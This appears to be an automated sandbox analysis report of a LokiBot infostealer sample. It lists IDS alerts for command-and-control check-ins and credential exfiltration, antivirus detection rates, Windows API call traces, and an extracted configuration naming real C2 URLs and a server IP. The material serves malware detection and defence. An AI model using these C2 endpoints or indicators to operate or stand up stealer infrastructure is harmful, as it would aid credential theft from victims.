2025-02-20T15:08:30.447083+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50048	104.21.80.1	80	TCP
2025-02-20T15:08:32.416537+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.6	50049	104.21.80.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/sccc/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.dfiCWCanbj.exe.3bf0000.1.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: dfiCWCanbj.exe	ReversingLabs: Detection: 55%
Source: dfiCWCanbj.exe	Virustotal: Detection: 62%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: dfiCWCanbj.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: dfiCWCanbj.exe, 00000000.00000003.2141548342.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, dfiCWCanbj.exe, 00000000.00000003.2138697881.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dfiCWCanbj.exe, 00000000.00000003.2141548342.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, dfiCWCanbj.exe, 00000000.00000003.2138697881.0000000003DB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000002.00000002.3383506811.0000000000331000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000002.00000002.3383506811.0000000000331000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B9445A
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9C6D1 FindFirstFileW,FindClose,	0_2_00B9C6D1
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00B9C75C
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B9EF95
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B9F0F2
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B9F3F3
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B937EF
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B93B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B93B12
Source: C:\Users\user\Desktop\dfiCWCanbj.exe	Code function: 0_2_00B9BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00B9BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	2_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49712 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49712 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49747 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49747 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49747 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49747 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49712 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49758 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49730 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49758 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49710 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49758 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49730 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49730 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49712 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49758 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49774 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49774 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49774 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49774 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49834 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49834 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49834 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49789 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49789 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49789 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49730 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49847 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49847 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49847 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49789 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49834 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49847 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49859 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49859 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49859 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49859 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49730
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.6:49711 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49806 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49806 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49712
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49806 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49859
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49806 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49758
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49872 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49789
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49872 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49872 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49923 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49923 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49923 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49872 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49923 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49719 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49719 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49719 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49719 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49847
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49951 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49923
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49951
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49961 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49961 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49938 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49719
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49986 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49974 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49961 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49986 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49986 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49986 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49884 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49884 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49884 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50026 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49884 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49974 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:49974 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49961 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50049 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50049 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50049 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50010 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49806
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:49974 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50049 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50045 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49872
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50045 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50040 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49897 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49897 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50022 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50011 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50012 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50030 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50018 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50045 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50017 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50014 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50046 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:49820 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50025 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50046 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50045 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50031 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:49938
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:50040 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.6:50040 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.6:49820 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50013 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.80.1:80 -> 192.168.2.6:50010
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.6:50043 -> 104.21.80.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.6:50031 -> 104.21.80.1:80
